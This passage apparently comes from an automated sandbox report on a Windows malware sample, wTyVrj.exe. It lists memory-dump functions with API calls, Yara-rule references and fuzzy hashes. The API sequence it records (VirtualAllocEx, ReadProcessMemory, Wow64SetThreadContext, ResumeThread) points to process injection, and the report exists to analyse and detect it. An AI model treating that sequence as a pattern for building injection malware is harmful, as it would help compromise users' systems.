Instruction Fuzzy Hash: FA21F4B5900208EFDB10CF9AD884AEEBBF4FB48310F10841AE914A7350D379AA54CFA5

Function 0485E018 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0485DFE6,?,?,?,?,?), ref: 0485E0A7

Memory Dump Source

Source File: 0000000B.00000002.1541023404.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4850000_wTyVrj.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8d2cec43d9d2ba240036bce948ee702a7b30e011fd1417de5288bd9c7a75c409
Instruction ID: 6213acf41720c11e685e974c3db7e23249ce4dad9f9b97071e7d598aab5d85e7
Opcode Fuzzy Hash: 8d2cec43d9d2ba240036bce948ee702a7b30e011fd1417de5288bd9c7a75c409
Instruction Fuzzy Hash: E021C3B5900248DFDB10CF9AD984ADEBBF4FB48310F14841AE914A7350D379AA44CFA5

Function 04E9F6A0 Relevance: 1.6, APIs: 1, Instructions: 64
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04E9F726

Memory Dump Source

Source File: 0000000B.00000002.1542529120.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e90000_wTyVrj.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 08639ae8a24f0ea5d8924f6600842d695d175c5be6b93ef57181fc298cb2c78a
Instruction ID: 7e3204ddffe0dc5971e10ebbb13bc781664ffbf889efe0b4fc7c7468ec0a6b1f
Opcode Fuzzy Hash: 08639ae8a24f0ea5d8924f6600842d695d175c5be6b93ef57181fc298cb2c78a
Instruction Fuzzy Hash: E9213471D103088FEB24CFAAC4817EEBBF4EF48314F14842AD459A7240CB789945CFA5

Function 04E9F6A8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04E9F726

Memory Dump Source

Source File: 0000000B.00000002.1542529120.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e90000_wTyVrj.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7b98edde7e5600b1c557760bbf09ce7c9ac5f17a23a4e29594681012a2abc4a1
Instruction ID: 2633d86e959b29612744870158fcc440ec0bc2e941f124ec1016c1180d5cf738
Opcode Fuzzy Hash: 7b98edde7e5600b1c557760bbf09ce7c9ac5f17a23a4e29594681012a2abc4a1
Instruction Fuzzy Hash: EC213571D103088FEB14DFAAC485BEEBBF4EF48314F14842AD559A7281CB78A945CFA5

Function 04E9F930 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04E9F9B0

Memory Dump Source

Source File: 0000000B.00000002.1542529120.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e90000_wTyVrj.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: db368f4f6cf214fa1394d46b4eb679244ed646b37c7b7b65cfecf0dbf3851a9c
Instruction ID: e435721211421175dc5bda22b370ab83a6c1fa541f4ab0f4d1d0d32f1c04a622
Opcode Fuzzy Hash: db368f4f6cf214fa1394d46b4eb679244ed646b37c7b7b65cfecf0dbf3851a9c
Instruction Fuzzy Hash: EF210371C003499FDB10CFAAC881BEEBBF5FF48310F10842AE958A7240C739A9408BA5

Function 04E9F77B Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04E9F7EE

Memory Dump Source

Source File: 0000000B.00000002.1542529120.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e90000_wTyVrj.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b3ff253d9d9354413ffe256c4f2d71592a5ee7b7545bc635293672a02abcbab5
Instruction ID: 6603e415eadc48d5359bc0d809cc555cfd2f19b2a0b1ceb56baa1a212a04c72a
Opcode Fuzzy Hash: b3ff253d9d9354413ffe256c4f2d71592a5ee7b7545bc635293672a02abcbab5
Instruction Fuzzy Hash: 861114769003489FDB24CFAAC845BEEBBF5EF88310F24881AE515A7250C7759940CFA1

Function 04E9F780 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04E9F7EE

Memory Dump Source

Source File: 0000000B.00000002.1542529120.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e90000_wTyVrj.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d237210d8826928a5eed5e7010f226b28cb35319e8db9fbfe466f071ab926335
Instruction ID: c18a99e5c587c4e10820bb5b05f36be822f9e3d2fc5d514c9ea7e473ad568506
Opcode Fuzzy Hash: d237210d8826928a5eed5e7010f226b28cb35319e8db9fbfe466f071ab926335
Instruction Fuzzy Hash: AF1126769003489FDB24DFAAC845BEEBBF5EF48320F248419E515A7250CB75A940CBA5

Function 04E9F1B8 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 04E9F222

Memory Dump Source

Source File: 0000000B.00000002.1542529120.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e90000_wTyVrj.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1766ee4207a6037ac4f7d093d7491cc5418d04c621cad5e6ba9b99f64124ce85
Instruction ID: 0e232a38710bdbbed8ff04d7dedb205c57de64575287fed741a3563effd69426
Opcode Fuzzy Hash: 1766ee4207a6037ac4f7d093d7491cc5418d04c621cad5e6ba9b99f64124ce85
Instruction Fuzzy Hash: 4F114671D003488FEB28DFAAC4457DEFBF4EB88310F20882AD519A7650CA79A940CF95

Function 04E9F1C0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 04E9F222

Memory Dump Source

Source File: 0000000B.00000002.1542529120.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e90000_wTyVrj.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 392b92a29619aad1d7ec99f75986f7f2de69225aed2665d60db79c121cb7a4be
Instruction ID: c8a06db1d8a32ad85eeccad1f3c9c634999e1a0444ad6d484770e47df5f67039
Opcode Fuzzy Hash: 392b92a29619aad1d7ec99f75986f7f2de69225aed2665d60db79c121cb7a4be
Instruction Fuzzy Hash: AE113A75D003488FDB24DFAAD4457DEFBF4EB48314F248419D519A7240CB79A940CB95

Function 0485BD40 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0485BDA6

Memory Dump Source

Source File: 0000000B.00000002.1541023404.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4850000_wTyVrj.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 47b880519aa604764aa8d8c868044a9a14525521e9abc5ca6cc3238cccf56e5d
Instruction ID: 150754a64aa7a9c55a90556c488f4189c1b922bda1ec0401d3731111d93a262d
Opcode Fuzzy Hash: 47b880519aa604764aa8d8c868044a9a14525521e9abc5ca6cc3238cccf56e5d
Instruction Fuzzy Hash: 7A11DFB6C006498FDB20DF9AC844ADEFBF4EF88310F14851AD859A7610D379A545CFA5

Function 0217D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1528832272.000000000217D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0217D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_217d000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdb8d8049a623e2a0963f1463056e22fac2f8ccaaed37c7c68789e0b794092fb
Instruction ID: 6c06221fe8e7431c7e6f3cbd9aa7d58de6ca2f7517baabbf0cb4c26d425b3cd5
Opcode Fuzzy Hash: bdb8d8049a623e2a0963f1463056e22fac2f8ccaaed37c7c68789e0b794092fb
Instruction Fuzzy Hash: DF210372540248EFDB19DF14E9C0B26BF75FFC8318F24C569E90A0B256C336D456CAA2

Function 0218D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1528907451.000000000218D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0218D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_218d000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4692a4f22ccba9b296f638af927eced99fb9af64a8ed5ead70c9595132e5b80
Instruction ID: d67365263f0a4465720f3b9c60722e101743fb8b009aefd3fe19162c93770263
Opcode Fuzzy Hash: a4692a4f22ccba9b296f638af927eced99fb9af64a8ed5ead70c9595132e5b80
Instruction Fuzzy Hash: 0421D071644304EFDB18EF24E9C4B26BB65EB84314F20C56DE80A4B2D6C336D847CE62

Function 0218D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1528907451.000000000218D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0218D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_218d000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 741d4af2fe7670fa1e0e56e3b454b0c1f3d4fa1708122ac9a0a74aecad95e4ed
Instruction ID: 874d8b7e8fc0f916e7bcc477d9e5ab687a254a55a6101c29500978975b2d340f
Opcode Fuzzy Hash: 741d4af2fe7670fa1e0e56e3b454b0c1f3d4fa1708122ac9a0a74aecad95e4ed
Instruction Fuzzy Hash: 8721C571544304EFDB15EF64E5C0B25BB66FB84314F24C56DE90A4B2D2C336D846CE62

Function 0218D007 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1528907451.000000000218D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0218D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_218d000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 198bf3fa8fc15501592428d4cf33d9186ac4cc3dba3ad82258b277356086aae9
Instruction ID: 09cf0bbdeb4618b965b05a27ed76ccfac796ba37d9a3d01e21873bd7f11e5120
Opcode Fuzzy Hash: 198bf3fa8fc15501592428d4cf33d9186ac4cc3dba3ad82258b277356086aae9
Instruction Fuzzy Hash: C3218E755493809FDB12DF20D9D0715BF71EB46214F28C5DAD8898F6A7C33A980ACB62

Function 0217D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1528832272.000000000217D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0217D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_217d000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction ID: c5534c1049e2428c508b76c75b3c40d374c6a6de1a933a94c0d8b8ee562158c2
Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction Fuzzy Hash: A511B176544284DFCB15CF10E5C4B16BF71FF84328F24C6A9D8490B656C336D456CBA2

Function 0218D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1528907451.000000000218D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0218D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_218d000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction ID: d3be533c5ca1be5996cd079d77afa1d0c1eab4efaa290be42fb5200005f49a72
Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction Fuzzy Hash: 6011BB75944280DFCB15DF20E5C0B15FBA2FB84314F24C6A9D8494B696C33AD40ACF62

Function 0217D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1528832272.000000000217D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0217D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_217d000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aec4d6511b092b631595040cb80d05a9727016074f28fec7c610ef04296dfb6e
Instruction ID: cad71ccefa100281bb115b5a74f8c414d1d92995f5ad961858f5e0cafb63c9e0
Opcode Fuzzy Hash: aec4d6511b092b631595040cb80d05a9727016074f28fec7c610ef04296dfb6e
Instruction Fuzzy Hash: 61012B310443489EF7204F25DDC4B66BBB8DFC1628F04C51AED180F282C3399840CBB2

Function 0217D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1528832272.000000000217D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0217D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_217d000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4aeb136d81e9ffb30181377b9fe55956f2bea472d42575fc76de18e1c8ce10f
Instruction ID: 69aab540d63561e5248f0e384411d27d48534ab6a3553cf350cad21bc6511f1c
Opcode Fuzzy Hash: b4aeb136d81e9ffb30181377b9fe55956f2bea472d42575fc76de18e1c8ce10f
Instruction Fuzzy Hash: 1FF06271444344AEE7208E19DD88B66FFA8EF81638F18C55AED484F296C3799944CBB1

Analysis Process: wTyVrj.exePID: 3736, Parent PID: 6668COMMON

Execution Graph

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	98.2%
Signature Coverage:	0%
Total number of Nodes:	224
Total number of Limit Nodes:	26

Executed Functions

Function 071CC640 Relevance: .9, Instructions: 876COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3949552606.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_71c0000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85e7ae4bc5ab5062d23fc61532c42645dae3a145ab992083c7dd01d98af4e3a0
Instruction ID: 7cad6fa08bab449ca0847c062327acacb4083ff17b9b8fa54da2673a14ac228d
Opcode Fuzzy Hash: 85e7ae4bc5ab5062d23fc61532c42645dae3a145ab992083c7dd01d98af4e3a0
Instruction Fuzzy Hash: 3E628C74B002058FDB25DBA8D554BADB7E2EF88354F14856DE40AEB394DB34EC42CBA1

Function 071CBD73 Relevance: .4, Instructions: 433COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3949552606.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_71c0000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad14f90f5253f90bba8a78e6f476c58bd402a7c4619ace42bc3a3c5beec44eaf
Instruction ID: 1d2394b5d7fc95e9595492e860ed31cefd92f5175937689a333fc1e2281393f4
Opcode Fuzzy Hash: ad14f90f5253f90bba8a78e6f476c58bd402a7c4619ace42bc3a3c5beec44eaf
Instruction Fuzzy Hash: F7E14871B041158FDB25CBA8D451BAEBBB2EF99320F24806EE50ADB391CB35DC4587E1

Function 028DF621 Relevance: 6.1, APIs: 4, Instructions: 135
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 028DF6AE
GetCurrentThread.KERNEL32 ref: 028DF6EB
GetCurrentProcess.KERNEL32 ref: 028DF728
GetCurrentThreadId.KERNEL32 ref: 028DF781

Memory Dump Source

Source File: 00000010.00000002.3910739016.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_28d0000_wTyVrj.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 335f9245e96a1b7119e595154747c46e717503bb81e844293dd3db8c0608f21b
Instruction ID: d44c3b51a3b3ff6ddf925c2ad1440152572001db5d4deea40d44f2878fc639da
Opcode Fuzzy Hash: 335f9245e96a1b7119e595154747c46e717503bb81e844293dd3db8c0608f21b
Instruction Fuzzy Hash: D85188B89003498FEB54CFA9D948BDEBFF1EF88304F248059E109AB361D7745948CB66

Function 028DF630 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 028DF6AE
GetCurrentThread.KERNEL32 ref: 028DF6EB
GetCurrentProcess.KERNEL32 ref: 028DF728
GetCurrentThreadId.KERNEL32 ref: 028DF781

Memory Dump Source

Source File: 00000010.00000002.3910739016.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_28d0000_wTyVrj.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 548a15732b43b560f858a7dff3e6618e92b87f0f1e9bf42b849cccd662c5a800
Instruction ID: 322703307c34dd27bd1b470d22e4eef349e73c6efd99d60c9965daa80e6dbebf
Opcode Fuzzy Hash: 548a15732b43b560f858a7dff3e6618e92b87f0f1e9bf42b849cccd662c5a800
Instruction Fuzzy Hash: F45175B89002498FEB14CFA9D948BDEBBF1EF88304F248459E109AB360D7749948CB65

Function 071CE690 Relevance: 2.8, Strings: 2, Instructions: 275
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 071CE6F6
$q, xrefs: 071CE6EA

Memory Dump Source

Source File: 00000010.00000002.3949552606.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_71c0000_wTyVrj.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: 024abb778edbb7cfe8be989f4526c2c5ebb69534bcecd6522424ad2d86d8a7cb
Instruction ID: 49f0e0267bbd6edd5985b78cbdb1449d9780e4d89b75015ecef25149f7a72f64
Opcode Fuzzy Hash: 024abb778edbb7cfe8be989f4526c2c5ebb69534bcecd6522424ad2d86d8a7cb
Instruction Fuzzy Hash: 9691AD78B003058BDB19EBB885517AE77E3AF84344F14882CD50ADB384EF71DC4A8791

Function 028DBB0C Relevance: 1.6, APIs: 1, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 028DBC2A

Memory Dump Source

Source File: 00000010.00000002.3910739016.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_28d0000_wTyVrj.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: dd8fce34798c255c3161a01643181c60908f90da5971aea1ffe63d39f97b8026
Instruction ID: 186fcd7f3200a762504e11ab9c6ef677cb03a609e3ba3ac33af43b053b5d379f
Opcode Fuzzy Hash: dd8fce34798c255c3161a01643181c60908f90da5971aea1ffe63d39f97b8026
Instruction Fuzzy Hash: 0451CFB5D10308AFEB14CF99C884ADEBFB5FF48314F25862AE819AB210D7759945CF90

Function 028D9730 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 028DBC2A

Memory Dump Source

Source File: 00000010.00000002.3910739016.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_28d0000_wTyVrj.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 6e9cfbb36a368839fe3e851cd6ecf869c3f9c8e8c4e75b789b5b173393c18e3d
Instruction ID: 89db4116563f809852b4b5633e374f5d912116085ee5e89649bc25f4aa9269fa
Opcode Fuzzy Hash: 6e9cfbb36a368839fe3e851cd6ecf869c3f9c8e8c4e75b789b5b173393c18e3d
Instruction Fuzzy Hash: BA51D0B5D10308DFEB14CF99C884ADEBBB5FF48314F25852AE819AB210D7759945CF90

Function 028DF871 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,028DF83E,?,?,?,?,?), ref: 028DF8FF

Memory Dump Source

Source File: 00000010.00000002.3910739016.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_28d0000_wTyVrj.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c599ed083f02f8e4a0de6c65d9455325b93d92cad879274b9197c4e9fe517136
Instruction ID: 21b627d53b761931e665d19c60c01f6e247c97e9c9dcd8f5d9dc1664def6035b
Opcode Fuzzy Hash: c599ed083f02f8e4a0de6c65d9455325b93d92cad879274b9197c4e9fe517136
Instruction Fuzzy Hash: E12107B5D00208EFDB10CF99D884ADEBBF4EB48320F10841AE958A7310C375A944CF65

Function 028DF1E0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,028DF83E,?,?,?,?,?), ref: 028DF8FF

Memory Dump Source

Source File: 00000010.00000002.3910739016.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_28d0000_wTyVrj.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5d699a13fa3706c24e2cafa2ef52c00e8d6bed56219b218a2786a2f71d09b02f
Instruction ID: 4f30ff67617d8303747c3b0a07dd8e9511f0889c068b09feb963e178ef62b8bd
Opcode Fuzzy Hash: 5d699a13fa3706c24e2cafa2ef52c00e8d6bed56219b218a2786a2f71d09b02f
Instruction Fuzzy Hash: E22116B9D00248EFDB10CF9AD984ADEBBF4EB48314F14801AE919A7310D379A944CFA1

Function 028DA488 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 028DA4F6

Memory Dump Source

Source File: 00000010.00000002.3910739016.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_28d0000_wTyVrj.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 64c7adfb32e7ea64a8cbd6a156329c9bbcedb7280f6637157bbedde4b10f0309
Instruction ID: efefd72dce852c3d597c4319e307f146d2cfc7b413fd36d507fa263ec3bd3b54
Opcode Fuzzy Hash: 64c7adfb32e7ea64a8cbd6a156329c9bbcedb7280f6637157bbedde4b10f0309
Instruction Fuzzy Hash: C81123BAC002489FDB24CF9AC844ADEFBF5EB88214F14805AD418A7201C375A649CFA5

Function 07247F10 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 07247F77

Memory Dump Source

Source File: 00000010.00000002.3951598344.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7240000_wTyVrj.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: d4016bbdb04a4d21442c28cf5c3ac96887316d7db01ded937276f77069995112
Instruction ID: 6f68f5d54efbf571276efa2633c703a661e6021770478dbba4e6dae263018f68
Opcode Fuzzy Hash: d4016bbdb04a4d21442c28cf5c3ac96887316d7db01ded937276f77069995112
Instruction Fuzzy Hash: E01112B1C1065A9FDB14CF9AC444BDEFBF4AF48220F11812AE818A7240D378A944CFA5

Function 028D94D4 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 028DA4F6

Memory Dump Source

Source File: 00000010.00000002.3910739016.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_28d0000_wTyVrj.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: feb62094253ff4213c3a01f83e1267031244952da366bf2b461fa515a6dcc189
Instruction ID: 0a1326ea1e37197f5cb16cb9d33c76ca7b845d63bc3bf65d707d103c7d0978b0
Opcode Fuzzy Hash: feb62094253ff4213c3a01f83e1267031244952da366bf2b461fa515a6dcc189
Instruction Fuzzy Hash: 7511F3B9C006498FDB14CF9AC444BDEFBF5EB89214F14845AD919B7200C375A549CFA5

Function 071CE67F Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

$q, xrefs: 071CE6EA

Memory Dump Source

Source File: 00000010.00000002.3949552606.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_71c0000_wTyVrj.jbxd

Similarity

API ID:
String ID: $q
API String ID: 0-1301096350
Opcode ID: 927f80c268d14b6b78595de3f615c606a231e952771428f08604573cea073ea6
Instruction ID: 3b2fd18937ee8daf99370a3ab530b40eb67957e43d8b9423a2ad90e653271b6e
Opcode Fuzzy Hash: 927f80c268d14b6b78595de3f615c606a231e952771428f08604573cea073ea6
Instruction Fuzzy Hash: D4014E7A7103154BCF2599E588063FA779B9F956A0F05043DC509F7280DB60DD0E83E2

Function 00F01334 Relevance: 1.3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

Strings

@>, xrefs: 00F01334

Memory Dump Source

Source File: 00000010.00000002.3908627225.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_f00000_wTyVrj.jbxd

Similarity

API ID:
String ID: @>
API String ID: 0-4195797533
Opcode ID: 22b2b61f98fca8c9347cf17b931322c9fe920d562f873e9e46866191fe658d2e
Instruction ID: f0690d49ba9bf873816defcc8fbf485c2862a7e83f4d4b1f78c3828ef4240ce0
Opcode Fuzzy Hash: 22b2b61f98fca8c9347cf17b931322c9fe920d562f873e9e46866191fe658d2e
Instruction Fuzzy Hash: 3311F6B5C006489FDB10DF9AC444BDEFBF4EB48320F10842AE459A7350D378A905CFA5

Function 071CB820 Relevance: .4, Instructions: 436COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3949552606.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_71c0000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 758627b0e399309d9dcf20f3b652b90c0d5d8293ea08241f9caee4a17d8890bf
Instruction ID: 6c00583ae04cd316b69a37fe5c3992c5006083f4a2e3d623d14e2ac783edfd00
Opcode Fuzzy Hash: 758627b0e399309d9dcf20f3b652b90c0d5d8293ea08241f9caee4a17d8890bf
Instruction Fuzzy Hash: 7AE1F4B5F042159BDB25DBA8D8917AEBBA2EF84310F24847DD845EB388DB34DC45CB81

Function 071CC62F Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3949552606.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_71c0000_wTyVrj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c970e0c49e4eaf32d27bd36628a30409180305813f6e0e5ccea906c92197ef3d
